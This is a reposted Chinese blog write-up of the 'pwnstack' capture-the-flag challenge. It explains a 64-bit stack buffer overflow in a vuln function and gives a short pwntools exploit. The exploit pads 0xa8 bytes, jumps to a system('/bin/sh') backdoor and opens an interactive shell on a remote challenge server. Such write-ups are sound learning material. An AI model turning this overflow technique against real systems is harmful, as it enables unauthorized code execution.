攻防世界1

2024/10/23 7:22:06 来源：https://blog.csdn.net/fanshaoze/article/details/142845058 浏览: 次关键词：攻防世界1

pwnstack

发现是64位文件

发现vuln双击进入

看到read知道这里是要将B1（177）的数据输入buf，这里涉及了栈溢出

发现system和binsh

后门

A8十进制是168

exp：

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','52779')
padding = b'a'*(0xa8)
door = 0x400762
payload = padding + p64(door)
io.sendline(payload)
io.interactive()

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

热文排行

热搜词

Java项目-基于springboot框架的疫情防控人员信息管理系统系统项目实战(附源码+文档) promise是什么？有什么作用？ GEE APP：汉森2000-2017年全球森林面积指定区域（国家）面积下载实验03分支---7-7 用天平找小球 js---三元表达式详解输出时间序列中的时区是什么Series.dt.tz_convert(tz)

攻防世界1

pwnstack

相关资讯

热文排行

最新新闻

推荐新闻

热搜词